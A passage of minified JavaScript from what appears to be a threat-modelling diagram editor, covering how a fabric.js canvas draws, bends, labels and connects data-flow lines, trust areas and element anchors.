Ou&&this.NavTreeChanged.emit(),this.onCanvasModified()}}setFlowSelected(e,i){var n,r,c;let d=i?1:0;if(this.seletedFlow){let T=this.seletedFlow;this.seletedFlow=null,this.setFlowSelected(T,!1)}if(e){this.seletedFlow=e,null===(n=this.getCanvasElementByCanvasID(e[ot.p0ID]))||void 0===n||n.set("opacity",d);let T=this.getViewBaseElement(e[ot.ID]);(0==d||this.instanceOfCanvasFlow(T)&&T.BendFlow)&&(null===(r=this.getCanvasElementByCanvasID(e[ot.p1ID]))||void 0===r||r.set("opacity",d)),i&&this.getCanvasElementByCanvasID(e[ot.p1ID])&&this.Canvas.bringToFront(this.getCanvasElementByCanvasID(e[ot.p1ID])),null===(c=this.getCanvasElementByCanvasID(e[ot.p2ID]))||void 0===c||c.set("opacity",d),this.Canvas.requestRenderAll()}}createFlow(e,i,n,r,c){let d=e,T=i,k=n-e,q=r-i;const Y=Math.PI/2-Math.acos(k/Math.sqrt(k*k+q*q)),te=this.BendFlow?50:0,pe=k/2+Math.sign(q)*te*Math.cos(Y),Re=q/2-te*Math.sin(Y);let Fe=null;this.instanceOfCanvasFlow(c)?Fe=c:console.error("Element is not a flow object",c);let Ne=["M",d.toString(),T.toString(),"q",pe.toString(),Re.toString(),k.toString(),q.toString()].join(" "),et=new Ei.fabric.Path(Ne,{fill:"",stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,canvasID:Fo(),selectable:!0,lockMovementX:!0,lockMovementY:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,transparentCorners:!0,cornerColor:"transparent",ID:c.ID,elementTypeID:Et.DataFlow,myType:wt.DataFlowLine,bendFlow:this.BendFlow,perPixelTargetFind:!0});et.setControlsVisibility({mtr:!1,mts:!1});let ut=this.flowCreateText(e,i,n,r,e+pe,i+Re,c.GetProperty("Name"));ut[ot.visible]=Fe.ShowName,et[ot.textID]=ut[ot.canvasID],ut[ot.flowID]=et[ot.canvasID];let Ze=new Ei.fabric.Path("M 15 0 L 10 5 L 10 -5 z",{fill:this.StrokeColor,stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,originX:"center",originY:"center",canvasID:Fo(),selectable:!1,myType:wt.DataFlowArrowE});Ze.setControlsVisibility({mtr:!1,mts:!1}),et[ot.arrowEID]=Ze[ot.canvasID],Ze[ot.flowID]=et[ot.canvasID],Ze[ot.visible]=Fe.ArrowPos!=wn.Start;let yt=new Ei.fabric.Path("M 15 0 L 10 5 L 10 -5 z",{fill:Fe.ArrowPos==wn.Both?this.StrokeColor:this.BackgroundColor,stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,originX:"center",originY:"center",canvasID:Fo(),selectable:!1,myType:wt.DataFlowArrowS});yt.setControlsVisibility({mtr:!1,mts:!1}),et[ot.arrowSID]=yt[ot.canvasID],yt[ot.flowID]=et[ot.canvasID],yt[ot.visible]=Fe.ArrowPos!=wn.End;let It=this.flowCreateCurvePoint("p1",et.path[1][1],et.path[1][2],et);et[ot.p1ID]=It[ot.canvasID],It[ot.flowID]=et[ot.canvasID],It[ot.visible]=this.BendFlow;let St=this.flowCreateCurveCircle("p0",et.path[0][1],et.path[0][2],et);et[ot.p0ID]=St[ot.canvasID],St[ot.flowID]=et[ot.canvasID];let Nt=this.flowCreateCurveCircle("p2",et.path[1][3],et.path[1][4],et);return et[ot.p2ID]=Nt[ot.canvasID],Nt[ot.flowID]=et[ot.canvasID],this.Canvas.add(et),this.Canvas.add(Ze),this.Canvas.add(yt),this.Canvas.add(ut),this.Canvas.add(It),this.Canvas.add(St),this.Canvas.add(Nt),this.Canvas.sendToBack(ut),this.Canvas.bringToFront(It),setTimeout(()=>{this.flowUpdateFlowArrow(c.ID)},100),et}flowCreateCurveCircle(e,i,n,r){var c=new Ei.fabric.Circle({left:i,top:n,radius:6.5,stroke:this.theme.Primary,fill:this.theme.Primary,originX:"center",originY:"center",name:e,canvasID:Fo(),myType:wt.DataFlowCircle,selectable:!1,hasBorders:!1,hasControls:!1});return c[ot.flowID]=r[ot.canvasID],c.setControlsVisibility({mtr:!1,mts:!1}),c}flowCreateCurvePoint(e,i,n,r){var c=new Ei.fabric.Circle({left:i,top:n,radius:7,stroke:this.theme.Primary,fill:this.theme.Primary,originX:"center",originY:"center",name:e,canvasID:Fo(),myType:wt.DataFlowPoint,selectable:!0,hasBorders:!1,hasControls:!1});return c[ot.flowID]=r[ot.canvasID],c.setControlsVisibility({mtr:!1,mts:!1}),c}flowCreateText(e,i,n,r,c,d,T){let k=e,q=i,Y=n-e,te=r-i,pe=c-k,Re=d-q;const Fe=Math.PI/2-Math.acos(Y/Math.sqrt(Y*Y+te*te));let Ne=pe<0?pe*Math.PI/4:0;Y<Ne&&(Ne=Y);let et=Re<0?Re*Math.PI/4:0;te<et&&(et=te);let ut=10,Ze=Math.cos(Fe),yt=Math.sin(Fe),It="left";Y<0&&te<0?(Ze*=-1,yt*=-1,It="right",ut=15):Y<0?(Ze*=1,yt*=-1,It="right",ut=15):te<0?(Ze*=-1,yt*=-1):(Ze*=1,yt*=-1),Ze*=ut,yt*=ut;let St=["M",(k+Math.cos(Fe)*ut).toString(),(q-Math.sin(Fe)*ut).toString(),"q",pe.toString(),Re.toString(),Y.toString(),te.toString()].join(" "),Nt=new Ei.fabric.Text(T,{left:k+Ne+Ze,top:q+et+yt,textAlign:"center",charSpacing:-50,path:new Ei.fabric.Path(St,{strokeWidth:1,visible:!1}),pathSide:It,pathStartOffset:0,fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,canvasID:Fo(),selectable:!0,perPixelTargetFind:!0,targetFindTolerance:4,hasBorders:!1,lockMovementX:!0,lockMovementY:!0,lockScalingX:!0,lockScalingY:!0,transparentCorners:!0,cornerColor:"transparent",myType:wt.ElementName});return Nt.setControlsVisibility({mtr:!1,mts:!1}),Nt}flowUpdateText(e){const i=this.getCanvasElementByCanvasID(e[ot.textID]);this.Canvas.remove(i);const n=this.flowCreateText(e.path[0][1],e.path[0][2],e.path[1][3],e.path[1][4],e.path[1][1],e.path[1][2],i.text);return n.styles=i.styles,n[ot.canvasID]=i[ot.canvasID],n[ot.visible]=i[ot.visible],n[ot.fontSize]=i[ot.fontSize],this.Canvas.add(n),e[ot.textID]=n[ot.canvasID],n[ot.flowID]=e[ot.canvasID],n}flowUpdateFlowArrow(e){if(this.MouseMode==Zs.Move)return;const i=this.getCanvasElementByID(e),n=this.getViewBaseElement(e),r=12;let c=this.getCanvasElementByCanvasID(i[ot.arrowEID]);c.set(ot.visible,[wn.End,wn.Both,wn.Initiator].includes(n.Data.ArrowPos));let d=this.getCanvasElementByCanvasID(i[ot.arrowSID]);if(d.set(ot.visible,[wn.Start,wn.Both,wn.Initiator].includes(n.Data.ArrowPos)),d.set("fill",n.Data.ArrowPos==wn.Initiator?this.BackgroundColor:this.StrokeColor),c[ot.visible]){let T=i.path[1][3]+i.strokeWidth/2,k=i.path[1][4]+i.strokeWidth/2,te=Math.atan2(i.path[1][1]-T,i.path[1][2]-k)+Math.PI;c.set("pathOffset",{x:c.left,y:c.top});let pe=c.path;pe[0][1]=T-r*Math.sin(te-Math.PI/6),pe[0][2]=k-r*Math.cos(te-Math.PI/6),pe[1][1]=T,pe[1][2]=k,pe[2][1]=T-r*Math.sin(te+Math.PI/6),pe[2][2]=k-r*Math.cos(te+Math.PI/6),c.set("path",pe),c.setCoords()}if(d[ot.visible]){let T=i.path[0][1]+i.strokeWidth/2,k=i.path[0][2]+i.strokeWidth/2,te=Math.atan2(i.path[1][1]-T,i.path[1][2]-k)+Math.PI;d.set("pathOffset",{x:d.left,y:d.top});let pe=d.path;pe[0][1]=T-r*Math.sin(te-Math.PI/6),pe[0][2]=k-r*Math.cos(te-Math.PI/6),pe[1][1]=T,pe[1][2]=k,pe[2][1]=T-r*Math.sin(te+Math.PI/6),pe[2][2]=k-r*Math.cos(te+Math.PI/6),d.set("path",pe),d.setCoords()}this.Canvas.requestRenderAll()}flowChangeLineType(e,i){let n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);n&&n[ot.myType]==wt.DataFlowLine&&(i==ed.Dashed?n.set(ot.strokeDashArray,[5,5]):delete n[ot.strokeDashArray]),this.Canvas.requestRenderAll(),this.onCanvasModified()}flowChangeBending(e,i){const n=this.getCanvasElementByID(e);n[ot.bendFlow]=i;let r=this.getCanvasElementByCanvasID(n[ot.p1ID]);if(0==n[ot.bendFlow]){let k=n.path[0][2]+(n.path[1][4]-n.path[0][2])/2;r.left=n.path[1][1]=n.path[0][1]+(n.path[1][3]-n.path[0][1])/2,r.top=n.path[1][2]=k,r.set(ot.visible,!1),r.set(ot.opacity,0)}else{const T=n.path[0][1],k=n.path[0][2];let te=T,pe=k,Re=n.path[1][3]-T,Fe=n.path[1][4]-k;const Ne=Math.PI/2-Math.acos(Re/Math.sqrt(Re*Re+Fe*Fe)),et=50,ut=Re/2+Math.sign(Fe)*et*Math.cos(Ne),Ze=Fe/2-et*Math.sin(Ne);r.left=n.path[1][1]=te+ut,r.top=n.path[1][2]=pe+Ze,r.set(ot.visible,!0),r.set(ot.opacity,1)}let c=n._calcDimensions();n.set({width:c.width,height:c.height,left:c.left,top:c.top,pathOffset:{x:c.width/2+c.left,y:c.height/2+c.top},dirty:!0}),n.setCoords();let d=this.getViewBaseElement(n[ot.ID]);this.flowUpdateFlowArrow(d.ID),this.flowUpdateText(n),this.Canvas.requestRenderAll()}flowChangeDirection(e){const i=this.getCanvasElementByID(e),n=this.getViewBaseElement(e),r=this.getFlowAnchorPoint(i[ot.fa2],this.getCanvasElementByCanvasID(i[ot.fe2])),c=this.getFlowAnchorPoint(i[ot.fa1],this.getCanvasElementByCanvasID(i[ot.fe1])),d=this.createFlow(r[0],r[1],c[0],c[1],n);d[ot.fa1]=i[ot.fa2],d[ot.fe1]=i[ot.fe2],d[ot.fa2]=i[ot.fa1],d[ot.fe2]=i[ot.fe1],this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p0ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p1ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p2ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowEID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowSID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.textID])),[ot.ID,ot.elementTypeID,ot.myType,ot.strokeDashArray,ot.bendFlow,ot.fontSize].forEach(q=>{d.set(q,i[q])});const k=i[ot.canvasID];this.getCanvasElementByCanvasID(d[ot.arrowSID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.arrowEID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.p0ID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.p1ID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.p2ID])[ot.flowID]=k,d[ot.canvasID]=k,this.Canvas.remove(i),this.flowChangeBending(n.ID,n.BendFlow),this.flowUpdateText(d),this.flowUpdateFlowArrow(n.ID),this.Canvas.requestRenderAll(),this.setFlowSelected(d,!0),this.SelectionChanged.emit(n),this.onCanvasModified()}flowChangeAnchor(e,i){const n=this.getCanvasElementByID(e);n[ot.fa+i.o]=i.fa,this.onMovingObject(this.getCanvasElementByCanvasID(n["fe"+i.o]))}dfOnPointMoving(e){let i=this.getCanvasElementByCanvasID(e[ot.flowID]);"p1"==e.name&&(i.path[1][1]=e.left,i.path[1][2]=e.top);let n=i._calcDimensions();i.set({width:n.width,height:n.height,left:n.left,top:n.top,pathOffset:{x:n.width/2+n.left,y:n.height/2+n.top},dirty:!0}),i.setCoords(),this.flowUpdateFlowArrow(i[ot.ID]),this.flowUpdateText(i)}createFlowAnchors(e,i,n=!0,r=!0,c=!1,d=!1){if(this.Diagram.DiagramType==xn.Hardware)return[];let T=6.5,k=13,Y=[];const te=(pe,Re,Fe)=>{let Ne=new Ei.fabric.Circle({left:pe,top:Re,radius:T,fill:this.StrokeColor,opacity:.15});const et=pe+T,ut=Re+T,Ze=4.33;let yt=new Ei.fabric.Line([et-Ze,ut-Ze,et+Ze,ut+Ze],{stroke:this.theme.Primary,selectable:!1}),It=new Ei.fabric.Line([et-Ze,ut+Ze,et+Ze,ut-Ze],{stroke:this.theme.Primary,selectable:!1});return new Ei.fabric.Group([Ne,yt,It],{left:pe,top:Re,hasControls:!1,hasBorders:!1,lockRotation:!0,opacity:0,fa:Fe,myType:wt.FlowAnchor,canvasID:Fo()})};return n&&(Y.push(te(e-k-3,i/2-T,_i.East)),Y.push(te(T,i/2-T,_i.West))),r&&(Y.push(te(e/2-T,T,_i.North)),Y.push(te(e/2-T,i-k-3,_i.South))),c&&(Y.push(te(e-k-3,i/4-T,_i.EasternNorth)),Y.push(te(e-k-3,3*i/4-T,_i.EasternSouth)),Y.push(te(T,i/4-T,_i.WesternNorth)),Y.push(te(T,3*i/4-T,_i.WesternSouth)),Y.push(te(3*e/4-T,T,_i.NorthernEast)),Y.push(te(e/4-T,T,_i.NorthernWest)),Y.push(te(3*e/4-T,i-k-3,_i.SouthernEast)),Y.push(te(e/4-T,i-k-3,_i.SouthernWest))),d&&(Y.push(te(e-k-3,T,_i.NorthEast)),Y.push(te(T,T,_i.NorthWest)),Y.push(te(e-k-3,i-k-3,_i.SouthEast)),Y.push(te(T,i-k-3,_i.SouthWest))),Y.forEach(pe=>{pe.on("mousedown",Re=>{this.onFlowAnchorHit(Re)})}),Y}getFlowAnchorPoint(e,i){return e==_i.North?[i.left+i.width/2,i.top]:e==_i.East?i[ot.elementTypeID]==Et.PhysicalLink?[i.left+i.width-i.width/14,i.top+i.height/2]:[i.left+i.width,i.top+i.height/2]:e==_i.South?[i.left+i.width/2,i.top+i.height]:e==_i.West?i[ot.elementTypeID]==Et.PhysicalLink?[i.left+i.width/14,i.top+i.height/2]:[i.left,i.top+i.height/2]:e==_i.NorthernEast?[i.left+3*i.width/4,i.top]:e==_i.NorthernWest?[i.left+i.width/4,i.top]:e==_i.SouthernEast?[i.left+3*i.width/4,i.top+i.height]:e==_i.SouthernWest?[i.left+i.width/4,i.top+i.height]:e==_i.EasternNorth?[i.left+i.width,i.top+i.height/4]:e==_i.EasternSouth?[i.left+i.width,i.top+3*i.height/4]:e==_i.WesternNorth?[i.left,i.top+i.height/4]:e==_i.WesternSouth?[i.left,i.top+3*i.height/4]:e==_i.NorthEast?[i.left+i.width,i.top]:e==_i.NorthWest?[i.left,i.top]:e==_i.SouthEast?[i.left+i.width,i.top+i.height]:e==_i.SouthWest?[i.left,i.top+i.height]:null}textOnMovingPoint(e){let i=this.getCanvasElementByCanvasID(e[ot.textObjID]);if(!i)return void this.Canvas.remove(e);let n=i._objects.find(r=>r[ot.myType]==wt.ElementName);n.set("left",e.left-(i.left+i.width/2)),n.set("top",e.top-(i.top+i.height/2-8)),this.Canvas.requestRenderAll()}textOnMovingText(e){let i=this.getCanvasElementByCanvasID(e[ot.t0ID]),n=e._objects.find(r=>r[ot.myType]==wt.ElementName);i.set("left",e.left+e.width/2+n.left),i.set("top",e.top+e.height/2+n.top-8),this.Canvas.requestRenderAll()}onScaleElement(e){let i=e.transform.target,n=i._objects.find(pe=>pe[ot.myType]==wt.ElementType),r=i._objects.find(pe=>pe[ot.myType]==wt.ElementPhyElement),d=(i._objects.find(pe=>pe[ot.myType]==wt.ElementName),i.width*i.scaleX),T=i.height*i.scaleY;i.set({height:T,width:d,scaleX:1,scaleY:1}),n&&n.set({left:0,top:-T/2+5}),r&&r.set({left:0,top:T/2-15});let k=i._objects.filter(pe=>null!=pe[ot.fa]),q=6.5,Y=13;k.forEach(pe=>{pe[ot.fa]==_i.East?pe.set({left:d/2-Y-6,top:-q}):pe[ot.fa]==_i.West?pe.set({left:-d/2+q,top:-q}):pe[ot.fa]==_i.North?pe.set({left:-q,top:-T/2+q}):pe[ot.fa]==_i.South?pe.set({left:-q,top:T/2-Y-6}):pe[ot.fa]==_i.EasternNorth?pe.set({left:d/2-Y-6,top:-T/4}):pe[ot.fa]==_i.EasternSouth?pe.set({left:d/2-Y-6,top:T/4-Y}):pe[ot.fa]==_i.WesternNorth?pe.set({left:-d/2+q,top:-T/4}):pe[ot.fa]==_i.WesternSouth?pe.set({left:-d/2+q,top:T/4-Y}):pe[ot.fa]==_i.NorthernEast?pe.set({left:d/4-Y,top:-T/2+q}):pe[ot.fa]==_i.NorthernWest?pe.set({left:-d/4,top:-T/2+q}):pe[ot.fa]==_i.SouthernEast?pe.set({left:d/4-Y,top:T/2-Y-6}):pe[ot.fa]==_i.SouthernWest?pe.set({left:-d/4,top:T/2-Y-6}):pe[ot.fa]==_i.NorthEast?pe.set({left:d/2-Y-6,top:-T/2+q}):pe[ot.fa]==_i.NorthWest?pe.set({left:-d/2+6,top:-T/2+q}):pe[ot.fa]==_i.SouthEast?pe.set({left:d/2-Y-6,top:T/2-Y-6}):pe[ot.fa]==_i.SouthWest&&pe.set({left:-d/2+6,top:T/2-Y-6}),pe.setCoords()})}fireScaling(e){e.fire("scaling",{transform:{target:e}})}getCanvasElementByID(e){return this.Canvas.getObjects().find(i=>i[ot.ID]==e)}getCanvasElementByCanvasID(e){return this.Canvas.getObjects().find(i=>i[ot.canvasID]==e)}changeObjectType(e,i){let n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);if(n._objects){let r=n._objects.find(c=>c[ot.myType]==wt.ElementType);r&&(r.text="\xab"+i+"\xbb",n.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified())}else if(n[ot.textID]){let r=this.getCanvasElementByCanvasID(n[ot.textID]);r.text="\xab"+i+"\xbb",r.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified()}}changeObjectPhysicalElement(e,i){const n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);if(n._objects){let r=n._objects.find(c=>c[ot.myType]==wt.ElementPhyElement);if(r)r.text=i?i.GetProperty("Name"):"",n.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified();else{const c=new Ei.fabric.Text(i?i.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:0,top:n.height/2-15,myType:wt.ElementPhyElement});n[ot.elementTypeID]==Et.LogTrustArea&&(c[ot.originX]="left",c[ot.originY]="top",c.set({left:-n.width/2+5,top:-n.height/2+35})),n.add(c),this.Canvas.requestRenderAll(),this.onCanvasModified()}}else if(n[ot.textID]){let r=this.getCanvasElementByCanvasID(n[ot.textID]);r.text=i?i.GetProperty("Name"):"",r.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified()}}changeObjectName(e){var i;let n=this.getCanvasElementByID(e),r=this.getViewBaseElement(e),c=null;if(n._objects?c=n._objects.find(d=>d[ot.myType]==wt.ElementName):n[ot.myType]==wt.DataFlowLine&&(c=this.Canvas.getObjects().find(d=>d[ot.myType]==wt.ElementName&&d[ot.flowID]==n[ot.canvasID])),c&&r){if(c.text=null!=r.Ref?r.Ref.NameRaw:r.NameRaw,r instanceof M2||r instanceof os){if(r.FlowType==Xs.Extend?c.text="\xabextend\xbb":r.FlowType==Xs.Include&&(c.text="\xabinclude\xbb"),c.styles&&delete c.styles[0],r instanceof os&&r.ShowProtocolDetails){if((null===(i=r.ProtocolStack)||void 0===i?void 0:i.length)>0&&(c.text=c.text+" ("+r.ProtocolStack.map(d=>d.NameRaw).join(", ")+")"),r.SenderInterface){c.text=r.SenderInterface.Name+": "+c.text,(!c.styles||!c.styles[0])&&(c.styles={0:{}});for(let d=0;d<r.SenderInterface.Name.length;d++)c.styles[0][d]={fill:this.theme.Primary}}if(r.ReceiverInterface){c.text=c.text+" :"+r.ReceiverInterface.Name,(!c.styles||!c.styles[0])&&(c.styles={0:{}});for(let d=c.text.length-r.ReceiverInterface.Name.length;d<c.text.length;d++)c.styles[0][d]={fill:this.theme.Primary}}}c=this.flowUpdateText(n),c.set(ot.visible,null==r.Data.ShowName||r.Data.ShowName)}else{let d;d=r instanceof td||r instanceof zm||r instanceof As||r instanceof Hg?r.Ref.GetProperties().find(T=>"Name"==T.ID):r.GetProperties().find(T=>"Name"==T.ID),d.Type==Ii.TextArea&&c.set("top",-c.height/2)}c.set("dirty",!0),this.Canvas.requestRenderAll()}}changeObjectBorder(e){const i=this.getCanvasElementByID(e),n=this.getViewBaseElement(e);let r=null;i._objects?r=i._objects.find(c=>c[ot.myType]==wt.ElementBorder):i[ot.myType]==wt.DataFlowLine&&(r=i),r&&n&&(n.OutOfScope?r.set("strokeDashArray",[2,2]):i[ot.myType]==wt.TrustArea?r.set("strokeDashArray",[10,5]):delete r.strokeDashArray,r.set("dirty",!0),this.Canvas.requestRenderAll())}changeFontSize(){this.Canvas.getObjects().forEach(e=>{let i=null,n=null,r=null;e._objects?(i=e._objects.find(c=>c[ot.myType]==wt.ElementType),r=e._objects.find(c=>c[ot.myType]==wt.ElementPhyElement),n=e._objects.find(c=>c[ot.myType]==wt.ElementName)):e[ot.myType]==wt.DataFlowLine&&(n=this.getCanvasElementByCanvasID(e[ot.textID])),n&&n.set(ot.fontSize,e[ot.myType]!=wt.TrustArea?this.currentFontSizeConfig.Name:this.currentFontSizeConfig.Type),i&&i.set(ot.fontSize,this.currentFontSizeConfig.Type),r&&r.set(ot.fontSize,this.currentFontSizeConfig.Type)}),this.Canvas.requestRenderAll(),this.onCanvasModified()}renderIcon(e,i,n,r,c){e.save(),e.translate(i,n),e.rotate(Ei.fabric.util.degreesToRadians(c.angle));let k=document.createElement("img");k.src="data:image/svg+xml,%3C%3Fxml version='1.0' encoding='utf-8'%3F%3E%3C!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN' 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'%3E%3Csvg version='1.1' id='Ebene_1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x='0px' y='0px' width='595.275px' height='595.275px' viewBox='200 215 230 470' xml:space='preserve'%3E%3Ccircle style='fill:%23F44336;' cx='299.76' cy='439.067' r='218.516'/%3E%3Cg%3E%3Crect x='267.162' y='307.978' transform='matrix(0.7071 -0.7071 0.7071 0.7071 -222.6202 340.6915)' style='fill:white;' width='65.545' height='262.18'/%3E%3Crect x='266.988' y='308.153' transform='matrix(0.7071 0.7071 -0.7071 0.7071 398.3889 -83.3116)' style='fill:white;' width='65.544' height='262.179'/%3E%3C/g%3E%3C/svg%3E",e.drawImage(k,-12,-12,24,24),e.restore()}checkIntersection(){this.blockCheckingIntersection||(this.blockCheckingIntersection=!0,setTimeout(()=>{this.intersectionPairs.forEach(n=>n[2]=0);let e=[],i=this.Canvas.getObjects();for(let n=0;n<i.length;n++)for(let r=n;r<i.length;r++){let c=i[n],d=i[r];if(c[ot.ID]!=d[ot.ID]&&c.intersectsWithObject(d)){let T=Y=>Y[ot.elementTypeID]==Et.LogTrustArea||Y[ot.elementTypeID]==Et.PhyTrustArea,k=null,q=null;T(c)&&T(d)?c.width*c.height>d.width*d.height?(k=c,q=d):(k=d,q=c):T(c)?(k=c,q=d):T(d)&&(k=d,q=c),k&&(e.some(Y=>Y.key==q)||e.push({key:q,value:[]}),e.find(Y=>Y.key==q).value.push(k))}}e.forEach(n=>{let r=n.value[0];n.value.length>1&&(r=n.value.find(d=>d.width*d.height==Math.min(...n.value.map(T=>T.width*T.height))));let c=this.getViewBaseElement(r[ot.ID]);if(c&&this.instanceOfContainer(c)){let d=this.getViewBaseElement(n.key[ot.ID]);if(d){c.AddChild(d);const T=this.intersectionPairs.find(k=>k[0][ot.ID]==r[ot.ID]&&k[1][ot.ID]==n.key[ot.ID]);T?T[2]=1:this.intersectionPairs.push([r,n.key,1])}}});for(let n=0;n<this.intersectionPairs.length;n++){let r=this.intersectionPairs[n];if(0==r[2]){let c=this.getViewBaseElement(r[0][ot.ID]),d=this.getViewBaseElement(r[1][ot.ID]);c&&d&&this.instanceOfContainer(c)&&(null==c.Root&&console.log("Root is null"),c.Root.AddChild(d),this.intersectionPairs.splice(n,1),n--)}}this.blockCheckingIntersection=!1},1e3))}getCanvasSize(){let e=Number.MAX_VALUE,i=Number.MIN_VALUE,n=Number.MAX_VALUE,r=Number.MIN_VALUE;return this.Canvas.getObjects().forEach(c=>{c[ot.myType]!=wt.GridLine&&(c.aCoords.tl.x<e&&(e=c.aCoords.tl.x),c.aCoords.br.x>i&&(i=c.aCoords.br.x),c.aCoords.tl.y<n&&(n=c.aCoords.tl.y),c.aCoords.br.y>r&&(r=c.aCoords.br.y))}),e-=5,n-=5,i+=5,r+=5,this.xMax=i,this.yMax=r,[e,n,i,r]}setCanvasColor(){if(this.Canvas.backgroundColor!=this.BackgroundColor){this.Canvas.backgroundColor=this.BackgroundColor,Ei.fabric.Object.prototype.cornerColor=this.StrokeColor;let e=n=>{if(n.stroke&&n.stroke!=this.theme.Primary&&n.set("stroke",this.StrokeColor),n.fill&&n.fill!=this.theme.Primary){let r="";"white"==n.fill?r="black":"black"==n.fill||"rgb(0,0,0)"==n.fill?r="white":"transparent"==n.fill?r=n.fill:n.fill==t.BackgroundColorDark?r=t.BackgroundColorLight:n.fill==t.BackgroundColorLight?r=t.BackgroundColorDark:console.log("obj fill",n.fill),n.set("fill",r)}if(n.cornerColor&&n.cornerColor!=this.theme.Primary){let r="";"transparent"==n.cornerColor?r="transparent":"white"==n.cornerColor?r="black":"black"==n.cornerColor?r="white":console.log("cornerColor",n.cornerColor),n.set("cornerColor",r)}},i=n=>{n.forEach(r=>{e(r),r._objects&&i(r._objects)})};i(this.Canvas.getObjects()),this.Canvas.renderAll()}}instanceOfCanvasFlow(e){return e instanceof os||e instanceof M2}instanceOfContainer(e){return e instanceof zm||e instanceof Ys||e instanceof sf}instanceOfElementType(e){return e instanceof ns||e instanceof lc}}return t.BackgroundColorDark="#1E1E1E",t.BackgroundColorLight="#FFFFFF",t.GridSize=20,t})();class $T extends D2{CopyElement(){this.SelectedElement instanceof td||this.SelectedElement instanceof zm||this.SelectedElement instanceof os||(this.copyID=this.SelectedElement.ID)}PasteElement(){if(!this.copyID)return;const a=this.getViewBaseElement(this.copyID),e=this.getCanvasElementByID(this.copyID);if(a){const i=this.createElement({stencilRef:{name:"",stencilID:a.GetProperty("Type").ID}},e.left+e.width+10,e.top);i.CopyFrom(a.Data),i.Name+="-Copy";const n=this.getCanvasElementByID(i.ID);n.set("width",e.width),n.set("height",e.height),this.fireScaling(n),this.copyID=null}}initializeCanvas(a){var e;if(!super.initializeCanvas(a))return!1;if(!this.Diagram.Canvas&&this.Diagram.DiagramType==xn.Hardware){let i=this.dataService.Config.GetStencilTypes().find(c=>c.ElementTypeID==Et.PhyTrustArea&&"Device Casing"==c.Name);i||(i=this.dataService.Config.GetStencilTypes().find(c=>c.IsDefault&&c.ElementTypeID==Et.PhyTrustArea));const n=this.createElement({stencilRef:{name:"",stencilID:i.ID}},5,5);let r=this.getCanvasElementByID(n.ID);n.Name=(null===(e=this.dataService.Project.FindDeviceOfDiagram(this.Diagram))||void 0===e?void 0:e.Name)+"'s Casing",r.set("scaleX",(a.clientWidth-200)/r.width),r.set("scaleY",(a.clientHeight-100)/r.height),this.fireScaling(r),setTimeout(()=>{this.SendToBack(),this.SelectedElement=null},100)}return this.dataService.Project.DFDElementsChanged.subscribe(i=>{i.Type==Ja.Removed&&this.deleteElement(i.ID)}),!0}instantiateFlow(){return lc.Instantiate(os.GetDefaultType(this.dataService.Config),this.dataService.Project,this.dataService.Config)}createElement(a,e,i){let n,r;if(a.stencilRef.stencilID)n=this.dataService.Config.GetStencilType(a.stencilRef.stencilID),r=lc.Instantiate(n,this.dataService.Project,this.dataService.Config),n.Name!=a.stencilRef.name&&(r.Name=Gi.FindUniqueName(a.stencilRef.name,this.getViewBaseElements().map(k=>k.Name)));else if(a.stencilRef.elementID)n=this.dataService.Project.GetDFDElement(a.stencilRef.elementID).GetProperty("Type"),r=td.InstantiateRef(this.dataService.Project.GetDFDElement(a.stencilRef.elementID),this.dataService.Project,this.dataService.Config);else if(a.stencilRef.templateID){let k=this.dataService.Config.GetStencilTypeTemplate(a.stencilRef.templateID);for(let q=0;q<k.StencilTypes.length;q++){let Y=k.Layout[q].name;if(Y||(Y=k.StencilTypes[q].Name),r=this.createElement({stencilRef:{name:Y,stencilID:k.StencilTypes[q].ID}},e+k.Layout[q].x,i+k.Layout[q].y),k.StencilTypes[q].ElementTypeID==Et.PhyTrustArea||k.StencilTypes[q].ElementTypeID==Et.LogTrustArea){r.Name=Gi.FindUniqueName(a.stencilRef.name,this.dataService.Project.GetDFDElements().filter(pe=>pe!=r).map(pe=>pe.Name));let te=this.getCanvasElementByID(r.ID);te.set("scaleX",k.Layout[q].width/te.width),te.set("scaleY",k.Layout[q].height/te.height),this.fireScaling(te)}}return r}r.NameChanged.subscribe(k=>this.changeObjectName(r.ID)),r.OutOfScopeChanged.subscribe(k=>this.changeObjectBorder(r.ID)),r.TypeChanged.subscribe(k=>this.changeObjectType(r.ID,k.Name)),r.PhysicalElementChanged.subscribe(k=>this.changeObjectPhysicalElement(r.ID,k));let 